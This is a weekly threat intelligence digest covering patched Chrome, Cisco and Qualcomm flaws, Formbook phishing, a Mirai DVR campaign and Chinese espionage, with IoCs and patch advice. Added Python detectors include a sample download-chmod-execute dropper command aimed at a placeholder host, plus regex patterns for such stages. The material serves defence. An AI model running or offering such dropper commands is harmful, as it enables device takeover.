Cyber Threat Intelligence Digest: Week 23

11th June 2025 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary - Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Google Patches Actively Exploited Chrome Vulnerability Tracked as CVE-2025-5419 - On June 2, 2025, Google patched CVE-2025-5419, an actively exploited high-severity vulnerability affecting its Chrome web browser. Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoît Sevens first disclosed and reported CVE-2025-5419 to Google on May 27, 2025. The update also patched CVE-2025-5068, a medium-severity vulnerability with no known exploitation at the time of writing.

  • CVE-2025-5419 is an out-of-bounds read and write flaw in Chrome’s V8 JavaScript engine. Successful exploitation allows threat actors to trigger heap corruption via a maliciously crafted HTML page, potentially leading to remote code execution (RCE).
  • CVE-2025-5068 is a use-after-free flaw in Chrome’s Blink rendering engine. Successful exploitation allows threat actors to trigger heap corruption via a maliciously crafted HTML page, potentially leading to RCE.

Cisco Patches Three ISE and CCP Vulnerabilities With No Active Exploitation Reported - On June 4, 2025, Cisco patched CVE-2025-20286, CVE-2025-20129, and CVE-2025-20130, three vulnerabilities affecting its Identity Services Engine and Customer Collaboration Platform. Cisco confirmed that proof-of-concept (PoC) exploits were available for these vulnerabilities but found no evidence of active exploitation at the time of writing.

  • CVE-2025-20286 is a static credential flaw in Cisco Identity Services Engine (ISE) when deployed in Amazon Web Services (AWS), Microsoft Azure, or Oracle Cloud Infrastructure (OCI). The flaw stems from improper generation of credentials in these environments. Successful exploitation allows threat actors to extract credentials from one cloud deployment and access other ISE instances, potentially leading to unauthorised data access, executing administrative commands, configuration changes, or denial-of-service (DoS) conditions.
  • CVE-2025-20129 is an information disclosure flaw in the web-based chat interface of Cisco CCP caused by improper handling of HTTP requests. Successful exploitation allows threat actors to gain unauthorised access to sensitive data by redirecting chat traffic.
  • CVE-2025-20130 is an improper access control flaw in the API of Cisco ISE and Cisco ISE Passive Identity Connector (ISE-PIC) caused by insufficient file upload verification. Successful exploitation allows threat actors with administrative privileges to upload arbitrary files to the system.


Qualcomm Patches Three Adreno GPU Vulnerabilities Exploited in Limited Attacks - On June 2, 2025, Qualcomm Technologies, Inc. patched three n-day vulnerabilities (CVE-2025-21479, CVE-2025-21480, and CVE-2025-27038) in the Adreno Graphics Processing Unit (GPU) driver. Google Threat Analysis Group has detected limited exploitation activity involving these vulnerabilities. The following outlines the technical details of these vulnerabilities:

  • CVE-2025-21479 and CVE-2025-21480 are critical-severity incorrect authorisation vulnerabilities in Adreno GPU. Successful exploitation could allow threat actors to corrupt memory by running unauthorised commands in the GPU micronode.
  • CVE-2025-27038 is a high-severity use-after-free vulnerability in Adreno GPU. Successful exploitation could allow threat actors to corrupt memory during graphics rendering in Chrome.


Potential Threats

Threat Actors Exploit CVE-2017-0199 via Malicious Excel Attachments in Phishing Campaign to Deploy Formbook - On June 5, 2025, Fortinet reported a phishing campaign targeting Microsoft Windows users running Microsoft Office 2007 SP3, 2010 SP2, 2013 SP1, or 2016. Threat actors reportedly sent emails impersonating sales orders, using malicious Excel attachments to exploit CVE-2017-0199, a remote code execution vulnerability in Office’s Object Linking and Embedding (OLE) functionality. Threat actors aimed to deploy Formbook, malware designed to steal keystrokes, clipboard contents, and login credentials from vulnerable systems.


Threat Actors Exploit CVE-2024-3721 to Deliver a New Mirai Variant to DVR Devices - On June 6, 2025, Kaspersky Securelist published an analysis detailing a new Mirai variant delivered through the exploitation of CVE-2024-3721. CVE-2024-3721 is an unauthenticated remote code execution (RCE) vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recorder (DVR) devices running firmware versions up to 20240412.

Based on Kaspersky Securelist’s technical blog, the “/device.rsp” endpoint of their honeypot service received a malicious HTTP POST request exploiting CVE-2024-3721. The POST request includes a single-line shell script that performs the following actions on a Linux machine:

  • Accesses the /tmp directory
  • Removes any existing binary named “arm7”
  • Downloads a binary named “arm7” from the URL hxxp://42.112.26[.]36/arm7
  • Grants arm7 full permissions
  • Executes arm7

Kaspersky Securelist identified arm7 as a new Mirai variant designed for ARM32 DVR architecture. According to Kaspersky Securelist, the new Mirai variant employs string encryption using the RC4 algorithm for obfuscation. Once executed, it performs anti-virtualisation and anti-emulation checks by scanning the /proc directory and identifying processes related to VMware or QEMU-arm. It also verifies whether the binary runs from a hard-coded directory list. Once the system passes all these checks, the new Mirai variant launches its full functionality and connects to its command-and-control (C2) server to receive further instructions.
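As an added defender-side illustration (not code from the Kaspersky report or from Acumen), the dropper chain above turned into a check that can be run over HTTP requests seen by a web log or honeypot: it inspects POST requests to the /device.rsp endpoint named in the report and looks for the five stages in order. The request body format and the download host are constructed assumptions, not the real exploit or the IoC above.

```python
import re
from urllib.parse import unquote_plus

# Each regex matches one stage of the one-line dropper Kaspersky describes
# (cd /tmp; remove old arm7; fetch arm7; chmod; run). Stages are searched in
# order so a lone "chmod" or "cd /tmp" in a request does not fire.
STAGES = [
    ("cd_tmp",   re.compile(r"\bcd\s+/tmp\b")),
    ("rm_old",   re.compile(r"\brm\s+(?:-\w+\s+)?\S*arm7\b")),
    ("download", re.compile(r"\b(?:wget|curl)\b[^;&|]*\S+/arm7\b")),
    ("chmod",    re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+\S*arm7\b")),
    ("execute",  re.compile(r"(?<![\w/])\./arm7\b")),
]

def detect_dvr_dropper(method, path, body):
    """Return (is_dropper, stages_seen) for one HTTP request to a DVR.

    Only POST requests to /device.rsp are inspected, matching the endpoint
    named in the report; path, query and body are URL-decoded first.
    """
    decoded_path = unquote_plus(path)
    if method.upper() != "POST" or not decoded_path.startswith("/device.rsp"):
        return False, []
    text = decoded_path + "\n" + unquote_plus(body)
    hits, pos = [], 0
    for name, rx in STAGES:
        m = rx.search(text, pos)
        if m:
            hits.append(name)
            pos = m.end()
    # A fetch followed by execution is the dropper signature; the other
    # stages are reported for context.
    return ("download" in hits and "execute" in hits), hits

# Constructed request body (not the real capture); the download host is a
# documentation-range placeholder, not the IoC from the report.
MALICIOUS_BODY = ("cmd=cd+%2Ftmp%3B+rm+-rf+arm7%3B+wget+http%3A%2F%2F203.0.113.10%2Farm7"
                  "%3B+chmod+777+arm7%3B+.%2Farm7")

if __name__ == "__main__":
    print(detect_dvr_dropper("POST", "/device.rsp", MALICIOUS_BODY))
    print(detect_dvr_dropper("POST", "/device.rsp", "cmd=status"))
```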


Chinese State-Sponsored Campaigns, ShadowPad and PurpleHaze, Target Over 70 Global Organisations - On June 9, 2025, SentinelLabs reported two cyber espionage operations tracked as ShadowPad and PurpleHaze, attributed with high confidence to Chinese state-sponsored threat actors. These operations targeted over 70 organisations globally across sectors such as government, finance, manufacturing, and media, including attempted reconnaissance targeting SentinelOne.


General News

OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation - OpenAI recently revealed that state-backed threat actors from countries like China, Russia, North Korea, Iran, and the Philippines have been misusing ChatGPT for malicious purposes.

These include refining malware, spreading disinformation on social media, and conducting employment scams. For instance, actors in China and Russia used ChatGPT to generate political content in various languages for covert influence operations on platforms like X, Reddit, and Facebook, while North Korean operatives created fake resumes and personas to secure remote jobs and gain access to sensitive systems. The company has since banned the involved accounts and shared relevant data with partners.

The report also uncovered how hackers from groups like APT5 and APT15 used ChatGPT to assist in cyberattacks, including brute-force scripting and social media automation. A malware named “ScopeCreep,” linked to Russian actors, was developed using ChatGPT and targeted video game players. 


UK tax authority reveals scammers stole £47 million - Scammers stole £47 million ($63 million) from the UK’s HM Revenue and Customs (HMRC) last year by fraudulently claiming tax rebates intended for regular taxpayers. Around 100,000 people had their accounts affected, and HMRC is now contacting them by letter. Fortunately, no individuals will face personal financial loss, as the stolen funds came from HMRC, and affected accounts have been locked.

HMRC officials told Parliament that the agency itself wasn’t hacked. Instead, attackers used personal data obtained through phishing or malware (like infostealers) to hijack or create fake accounts. While £47 million was lost in this particular scam, HMRC successfully blocked £1.9 billion in other fraudulent attempts. A criminal investigation is ongoing, and arrests have already been made.


Microsoft makes a 'proactive investment' in EU cybersecurity amid bloc's tensions with US - Microsoft has launched a new European Security Program to provide free AI-powered threat intelligence to European governments, similar to what it already offers the U.S. The program aims to boost digital sovereignty and cybersecurity across the EU, its candidate countries, and several non-EU states like the UK, Switzerland, and Norway.

It includes embedding experts at Europol, supporting NGOs, investing in AI security research, and offering targeted guidance on vulnerabilities.

The initiative comes amid growing tensions between Europe and the U.S., with Microsoft promising to resist any U.S. orders to shut down its European cloud operations. It also follows criticism over Microsoft’s past security lapses, including breaches by Russian and Chinese hackers. Microsoft says the move reflects a long-term commitment to Europe’s digital future and will involve sharing AI tools used by its security teams to counter persistent nation-state and cybercriminal threats.


Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.


Severity legend: Limited Severity | Basic Severity | Moderate Severity | High Severity

Threat Actor              Severity Increase   Opportunity   Intent
Gunra Ransomware Group    NEW Basic           NEW 30        NEW 30
UNC6040                   NEW Basic           NEW 25        NEW 30
303                       NEW Basic           NEW 25        NEW 25
mila                      NEW Basic           NEW 30        NEW 5
Global Ransomware Group   NEW Basic           NEW 25        NEW 5


Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol. 

The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

Attackers                    Methods                  Vulnerabilities   Targets
NightSpire Ransomware Group  PathWiper                CVE-2024-3721     Yes24 Co., Ltd.
Arkana Ransomware Group      Mirai                    CVE-2025-32756    X.
RipperSec                    C&C Server               CVE-2025-49113    UNFI
RansomHouse Group            T1021 (Remote Services)  CVE-2025-5419     Veeam Backups
Chinese Hackers              PLUSINJECT               CVE-2017-0199     Optima Tax Relief


Prominent Information Security Events

Threat Actors Exploit CVE-2017-0199 via Malicious Excel Attachments in Phishing Campaign to Deploy Formbook

Source: Insikt Group | Validated Intelligence Event

IOC: SHA256 - 7e16ed31277c31c0370b391a1fc73f77d7f0cd13cc3bab0eaa9e2f303b6019af

IOC: SHA256 - 2bfbf6792ca46219259424efbbbee09ddbe6ae8fd9426c50aa0326a530ac5b14

IOC: URL - hxxps://agr[.]my/P6bJNr

On June 5, 2025, Fortinet reported a phishing campaign targeting Microsoft Windows users running Microsoft Office 2007 SP3, 2010 SP2, 2013 SP1, or 2016. Threat actors reportedly sent emails impersonating sales orders, using malicious Excel attachments to exploit CVE-2017-0199, a remote code execution vulnerability in Office’s Object Linking and Embedding (OLE) functionality. Threat actors aimed to deploy Formbook, malware designed to steal keystrokes, clipboard contents, and login credentials from vulnerable systems.

When opened on a vulnerable system, the Excel file exploits CVE-2017-0199 to fetch and execute a malicious HTML Application (HTA) file via mshta.exe. The HTA script contains base64-encoded content that, when decoded, downloads and writes an executable named sihost.exe to the %APPDATA% directory. This AutoIt-compiled executable includes an encrypted payload stored in a resource section labeled “SCRIPT.”

The malware uses the IsDebuggerPresent API to check for debugging, and if no debugger is detected, it decrypts the SCRIPT resource using a hard-coded XOR key (3NQXSHDTVT2DPK06) and extracts a component named “springmaker” to the %TEMP% directory. It executes the decrypted content from memory using the CallWindowProc API, ultimately launching 'Formbook' malware.
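As an added defender-side illustration (not code from the Fortinet report or from Acumen), the two host-observable stages described above, an Office process spawning mshta.exe and a sihost.exe being written under %APPDATA%, expressed as checks over constructed Sysmon-style process-create and file-create events. The event fields, the sample paths and the list of Office parent processes are assumptions.

```python
import ntpath
from dataclasses import dataclass

@dataclass
class Event:
    """Minimal Sysmon-style telemetry: 1 = process create, 11 = file create."""
    event_id: int
    image: str = ""
    parent_image: str = ""
    command_line: str = ""
    target_filename: str = ""

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}

def _base(path):
    return ntpath.basename(path).lower()

def office_spawns_mshta(ev):
    """CVE-2017-0199 stage: an Office process launching mshta.exe to run the HTA."""
    return (ev.event_id == 1 and _base(ev.image) == "mshta.exe"
            and _base(ev.parent_image) in OFFICE_APPS)

def sihost_in_appdata(ev):
    """Dropper stage: sihost.exe written under a user's AppData. The genuine
    sihost.exe (Shell Infrastructure Host) lives in System32, so a copy in
    %APPDATA% is the masquerade described for this campaign."""
    if ev.event_id != 11 or _base(ev.target_filename) != "sihost.exe":
        return False
    return "\\appdata\\" in ev.target_filename.lower()

def triage(events):
    """Return (rule, detail) pairs for every event that matches a stage."""
    findings = []
    for ev in events:
        if office_spawns_mshta(ev):
            findings.append(("office_spawns_mshta", ev.command_line))
        if sihost_in_appdata(ev):
            findings.append(("sihost_in_appdata", ev.target_filename))
    return findings

# Constructed events (not from the Fortinet report): a benign mshta launch from
# Explorer, the Excel -> mshta chain, the dropped file, and the real sihost.exe.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          r"mshta.exe C:\Tools\panel.hta"),
    Event(1, r"C:\Windows\System32\mshta.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
          "mshta.exe https://example.invalid/stage.hta"),
    Event(11, target_filename=r"C:\Users\alice\AppData\Roaming\sihost.exe"),
    Event(11, target_filename=r"C:\Windows\System32\sihost.exe"),
]
```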


Chinese State-Sponsored Campaigns, ShadowPad and PurpleHaze, Target Over 70 Global Organisations

Source: Insikt Group | Validated Intelligence Event

IOC: IP - 107[.]173[.]111[.]26

IOC: URL - downloads[.]trendav[.]vip

IOC: URL - epp[.]navy[.]ddns[.]info

IOC: URL - mail[.]ccna[.]organiccrap[.]com

On June 9, 2025, SentinelLabs reported two cyber espionage operations tracked as ShadowPad and PurpleHaze, attributed with high confidence to Chinese state-sponsored threat actors. These operations targeted over 70 organisations globally across sectors such as government, finance, manufacturing, and media, including attempted reconnaissance targeting SentinelOne.

Threat actors often gained initial access by exploiting vulnerabilities CVE-2024-8963 and CVE-2024-8190 in Ivanti Endpoint Manager Cloud Services Appliance—both previously covered in an Insikt Group Analyst Note (see sources). The threat actors also used the ShadowPad modular backdoor and the GOREshell reverse SSH malware to maintain persistent access.

  • In the ShadowPad operation, observed between June 2024 and March 2025, SentinelLabs observed ShadowPad samples loaded via DLL hijacking and communicating with the threat actor’s command-and-control (C2) server. The threat actors also used PowerShell scripts and Nimbo-C2 agents to collect and encrypt sensitive data.
  • The PurpleHaze operation, observed between September 2024 and October 2024, used the GOREshell backdoor, deployed using DLL hijacking and obfuscated with Garble, alongside other open-source tools from The Hacker’s Choice (THC) community. SentinelLabs attributed some PurpleHaze operations to Chinese state-sponsored groups overlapping with APT15 and UNC5174.


Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:

  • CVE-2025-5419, CVE-2025-5068: We recommend updating Google Chrome to version 137.0.7151.68/.69 for Windows and Mac, and 137.0.7151.68 for Linux to reduce the risk of exploitation.
  • CVE-2025-20286, CVE-2025-20129, and CVE-2025-20130: We recommend updating the affected products to the latest versions provided by the vendor to reduce the risk of exploitation.
  • CVE-2025-21479, CVE-2025-21480, CVE-2025-27038: We recommend applying the latest patches on affected devices to reduce the risk of exploitation.

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.